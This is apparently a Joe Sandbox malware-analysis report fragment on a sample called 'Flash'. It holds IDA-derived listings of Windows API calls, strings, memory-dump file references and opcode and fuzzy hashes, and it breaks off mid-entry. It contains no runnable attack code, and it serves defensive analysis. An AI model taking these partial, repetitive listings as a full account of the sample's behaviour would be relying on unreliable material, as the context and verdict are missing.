                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: 39eb6bf17f6209ff66f1a2d833c265aaf77903f22b4907d2f53b727b863b4d0e
                                                        • Instruction ID: 0b509a03cfe28cf262337e645c4d5fedf6b80d06efa35c4ad240536585b1a8e3
                                                        • Opcode Fuzzy Hash: 39eb6bf17f6209ff66f1a2d833c265aaf77903f22b4907d2f53b727b863b4d0e
                                                        • Instruction Fuzzy Hash: 9C210770505B949FEB73CB649895FEBBBFCAF01308F04049DE69A56182C7742D85CB51
                                                        APIs
                                                          • Part of subcall function 009E49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009E27AF,?,00000001), ref: 009E49F4
                                                        • _free.LIBCMT ref: 00A1FB04
                                                        • _free.LIBCMT ref: 00A1FB4B
                                                          • Part of subcall function 009E29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 009E2ADF
                                                        Strings
                                                        • Bad directive syntax error, xrefs: 00A1FB33
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: Bad directive syntax error
                                                        • API String ID: 2861923089-2118420937
                                                        • Opcode ID: 2dbda06961c2875d59fb8ea5901254854d3a48888891999c63c605a3c709fcdc
                                                        • Instruction ID: e3fab1205d4eee52d9db42302f53f0538915c0104223c259d9a46fed4f4e555f
                                                        • Opcode Fuzzy Hash: 2dbda06961c2875d59fb8ea5901254854d3a48888891999c63c605a3c709fcdc
                                                        • Instruction Fuzzy Hash: A5919D71900299AFCF15EFA5CC91AEEB7B4BF49310F14453AF816AB2A1DB34AD44CB50
                                                        APIs
                                                          • Part of subcall function 009E4AB2: __fread_nolock.LIBCMT ref: 009E4AD0
                                                        • _wcscmp.LIBCMT ref: 00A39DE1
                                                        • _wcscmp.LIBCMT ref: 00A39DF4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: f12f863cfa224ae1b986a72de5d41986459dcf06445a5a06c2559fa1a19bb637
                                                        • Instruction ID: 8fb93cad257b55891a3b497d3e9e0f2eb4f80617732139d0d910edf38903155e
                                                        • Opcode Fuzzy Hash: f12f863cfa224ae1b986a72de5d41986459dcf06445a5a06c2559fa1a19bb637
                                                        • Instruction Fuzzy Hash: 7541C771A40209BADF21ABA5CC46FAFBBBDEF85710F00447AFA00A7181D6B19D448B65
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A2032B
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00A20375
                                                          • Part of subcall function 009F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009E2A58,?,00008000), ref: 009F02A4
                                                          • Part of subcall function 009F09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 009F09E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: c2ff60f326539e6e5ff82d2f7e36f01c5fbad8181d15d9a1429795cff3480c1a
                                                        • Instruction ID: 22e6175d683faa624b177b82b32a04413afba2680eb67a473ca02af48bdcde7d
                                                        • Opcode Fuzzy Hash: c2ff60f326539e6e5ff82d2f7e36f01c5fbad8181d15d9a1429795cff3480c1a
                                                        • Instruction Fuzzy Hash: 0D21C371A0029C9BDF01DFD8D845BEE7BFC9F89300F00405AE504AB242DBB55A89CFA1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 36b05e2e9945b0f67e52cb6ae42b7542f64bb794cd25ec331f432b90d4b92ed5
                                                        • Instruction ID: 226dda898ca346533bdbc624d728dc24efcbabf0df320996615969f2a69cfe46
                                                        • Opcode Fuzzy Hash: 36b05e2e9945b0f67e52cb6ae42b7542f64bb794cd25ec331f432b90d4b92ed5
                                                        • Instruction Fuzzy Hash: 05F11474A083419FC714DF28C584A6ABBE5BFC9314F14892EF8999B351DB70E945CF82
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: ed32fb8771238ed09b9743b3aa1633238b6374f05c7c8d03abd585113883e755
                                                        • Instruction ID: 50252886fbfe5d3069485d450644cd8edfd9522efcd114041e831e7accf8a2cb
                                                        • Opcode Fuzzy Hash: ed32fb8771238ed09b9743b3aa1633238b6374f05c7c8d03abd585113883e755
                                                        • Instruction Fuzzy Hash: 8661CD71600249EBDF04CF2AD8806AA7BB5FF44750F5885A9EC29CF295EB35DD60CB50
                                                        APIs
                                                          • Part of subcall function 009F07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009F07EC
                                                          • Part of subcall function 009F07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 009F07F4
                                                          • Part of subcall function 009F07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009F07FF
                                                          • Part of subcall function 009F07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009F080A
                                                          • Part of subcall function 009F07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 009F0812
                                                          • Part of subcall function 009F07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 009F081A
                                                          • Part of subcall function 009EFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,009DAC6B), ref: 009EFFA7
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009DAD08
                                                        • OleInitialize.OLE32(00000000), ref: 009DAD85
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A12F56
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: d0e8e19df12fed0546df8047824cc469f53d99257475de374cbdeebfda67a5d7
                                                        • Instruction ID: fb296539d4487a7ac85c46a7d3c07ee6cf528d460d36b11bd74ecbf73d29e4cb
                                                        • Opcode Fuzzy Hash: d0e8e19df12fed0546df8047824cc469f53d99257475de374cbdeebfda67a5d7
                                                        • Instruction Fuzzy Hash: 0F819DB0B292408EC785DFBAAD8465E7FE9EB98304710856BD419CB372EF7048468F75
                                                        APIs
                                                        • _memset.LIBCMT ref: 009E59F9
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009E5A9E
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 009E5ABB
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: bb37d5dc265f247b2a91924bbee3b529a9c9634df224861e2457d5ea91549251
                                                        • Instruction ID: f0cc2ece3cf663971e4dcc9dc46c9e99faba208458f2d9bc3972158c096c4fd9
                                                        • Opcode Fuzzy Hash: bb37d5dc265f247b2a91924bbee3b529a9c9634df224861e2457d5ea91549251
                                                        • Instruction Fuzzy Hash: B43191B06157419FD721DF65D88469BBBF8FB48308F000A3EF59A87241EB71AD44CB52
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 009F5953
                                                          • Part of subcall function 009FA39B: __NMSG_WRITE.LIBCMT ref: 009FA3C2
                                                          • Part of subcall function 009FA39B: __NMSG_WRITE.LIBCMT ref: 009FA3CC
                                                        • __NMSG_WRITE.LIBCMT ref: 009F595A
                                                          • Part of subcall function 009FA3F8: GetModuleFileNameW.KERNEL32(00000000,00A953BA,00000104,00000004,00000001,009F1003), ref: 009FA48A
                                                          • Part of subcall function 009FA3F8: ___crtMessageBoxW.LIBCMT ref: 009FA538
                                                          • Part of subcall function 009F32CF: ___crtCorExitProcess.LIBCMT ref: 009F32D5
                                                          • Part of subcall function 009F32CF: ExitProcess.KERNEL32 ref: 009F32DE
                                                          • Part of subcall function 009F8D58: __getptd_noexit.LIBCMT ref: 009F8D58
                                                        • RtlAllocateHeap.NTDLL(00F50000,00000000,00000001,?,00000004,?,?,009F1003,?), ref: 009F597F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: f02a4ed529786cee442ce4bb4afbfd391e0209f97a0100ce2a97806d2c97022c
                                                        • Instruction ID: 7e92be16169cfd8db8cc1d9bec43c88de78a260f080c5cb77b462598d3711973
                                                        • Opcode Fuzzy Hash: f02a4ed529786cee442ce4bb4afbfd391e0209f97a0100ce2a97806d2c97022c
                                                        • Instruction Fuzzy Hash: 8E01D235301B0EEAE6196774AC02B7E328C8F82770F920526F7189A1E1DEF48D814761
                                                        APIs
                                                        • _free.LIBCMT ref: 00A392D6
                                                          • Part of subcall function 009F2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,009F9C54,00000000,009F8D5D,009F59C3), ref: 009F2F99
                                                          • Part of subcall function 009F2F85: GetLastError.KERNEL32(00000000,?,009F9C54,00000000,009F8D5D,009F59C3), ref: 009F2FAB
                                                        • _free.LIBCMT ref: 00A392E7
                                                        • _free.LIBCMT ref: 00A392F9
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                        • Instruction ID: c825ad91f3eea81f8844a2b347f7142404a0a3c1c382e08aab1a2c35f1ac1631
                                                        • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                        • Instruction Fuzzy Hash: 97E05BB1715B0257CA24A7B86E40FE377FC4FC8751F15051EB519D7142CE64F8518678
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: 3792dbbf8d084de4c564694030b7a3e8130e15b6bc79c2ab31ee6a4bea6563a8
                                                        • Instruction ID: 0262fb1ab75cb7cbe2f10fab1bcf1e2c7cf2ebf28e0892b06c147b89c6bcf834
                                                        • Opcode Fuzzy Hash: 3792dbbf8d084de4c564694030b7a3e8130e15b6bc79c2ab31ee6a4bea6563a8
                                                        • Instruction Fuzzy Hash: 1C325674648341DFCB24DF14C590B2ABBE5BF85304F15896EE88A9B362DB35EC45CB82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: EA06
                                                        • API String ID: 4104443479-3962188686
                                                        • Opcode ID: 978b78d60e3f56ad2b6797d6163e39456fa0547099a20b6054776aceaf479b89
                                                        • Instruction ID: 9d68f8b2e8e18d62f465657d74a32344cde8cf7d2bebc51a9882443dcd450003
                                                        • Opcode Fuzzy Hash: 978b78d60e3f56ad2b6797d6163e39456fa0547099a20b6054776aceaf479b89
                                                        • Instruction Fuzzy Hash: 2A419121E041E85BDF239B699C517BF7FA58B95710F6444B5F8C1FB287C5248D4483E1
                                                        APIs
                                                        • _strcat.LIBCMT ref: 00A4E20C
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                        • _wcscpy.LIBCMT ref: 00A4E29B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1012013722-0
                                                        • Opcode ID: dce661f8d222a55fa92ac2680ee59b6f4fb06c5976664541ca9ff1b7a56e2cbe
                                                        • Instruction ID: 5c73d88327c12fe210a1e1592909f1ec5e0f4eb1607a2a6ef2e7854c3f15ca80
                                                        • Opcode Fuzzy Hash: dce661f8d222a55fa92ac2680ee59b6f4fb06c5976664541ca9ff1b7a56e2cbe
                                                        • Instruction Fuzzy Hash: 1F91F639A00504DFCB19DF18C585AA9B7F5FF99310B55819AE81A8F3A6DB30FD41CB81
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A3614E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower
                                                        • String ID:
                                                        • API String ID: 2358735015-0
                                                        • Opcode ID: 8ea3471580cd5869491cdcfe8190e3cbe453829c3649615bef3fbac976c22404
                                                        • Instruction ID: 5f5172c8be89f0e4b46d45d741747d190d347321fbafa8f1989442f0f71c81e9
                                                        • Opcode Fuzzy Hash: 8ea3471580cd5869491cdcfe8190e3cbe453829c3649615bef3fbac976c22404
                                                        • Instruction Fuzzy Hash: 2B41A4B6A00209AFDB21DFA4C8819EFB7B8EB44350F15862EF516D7251EB709E44CB50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotificationSleep
                                                        • String ID:
                                                        • API String ID: 1821831730-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: 640094a576bf16fe93097680c9a601707e94e431323a4dea78a4e9fcead696d0
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: F231C571A0010ADFDB18DF58C484979FBAAFF99300B648AA5E509CB252E731EDC1CBC0
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 009E5FEF
                                                          • Part of subcall function 009F359C: __lock.LIBCMT ref: 009F35A2
                                                          • Part of subcall function 009F359C: DecodePointer.KERNEL32(00000001,?,009E6004,00A28892), ref: 009F35AE
                                                          • Part of subcall function 009F359C: EncodePointer.KERNEL32(?,?,009E6004,00A28892), ref: 009F35B9
                                                          • Part of subcall function 009E5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 009E5F18
                                                          • Part of subcall function 009E5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 009E5F2D
                                                          • Part of subcall function 009E5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009E526C
                                                          • Part of subcall function 009E5240: IsDebuggerPresent.KERNEL32 ref: 009E527E
                                                          • Part of subcall function 009E5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 009E52E6
                                                          • Part of subcall function 009E5240: SetCurrentDirectoryW.KERNEL32(?), ref: 009E5366
                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 009E602F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        • Opcode ID: 4c9563e74152c6657d0697711bdd6543936d5981859084e4247e8699e92ce2d6
                                                        • Instruction ID: 8e572adaec5f9bec88d57a293f43661fcea7f90032ee85c48556e2563afb9fa1
                                                        • Opcode Fuzzy Hash: 4c9563e74152c6657d0697711bdd6543936d5981859084e4247e8699e92ce2d6
                                                        • Instruction Fuzzy Hash: 82118EB19183019BC711DFA9EC05A5EBBF8EFD9350F00891BF044872A1DF74A945CB92
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,009E3E72,?,?,?,00000000), ref: 009E4327
                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,009E3E72,?,?,?,00000000), ref: 00A20717
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 9ab94599629eaccf0c71ee3c06f139c281c6559c9d25a2757990e28b97ede058
                                                        • Instruction ID: 134eafd5532a9ad648fd07672b776a591c18d1292328031c249951665beec9b0
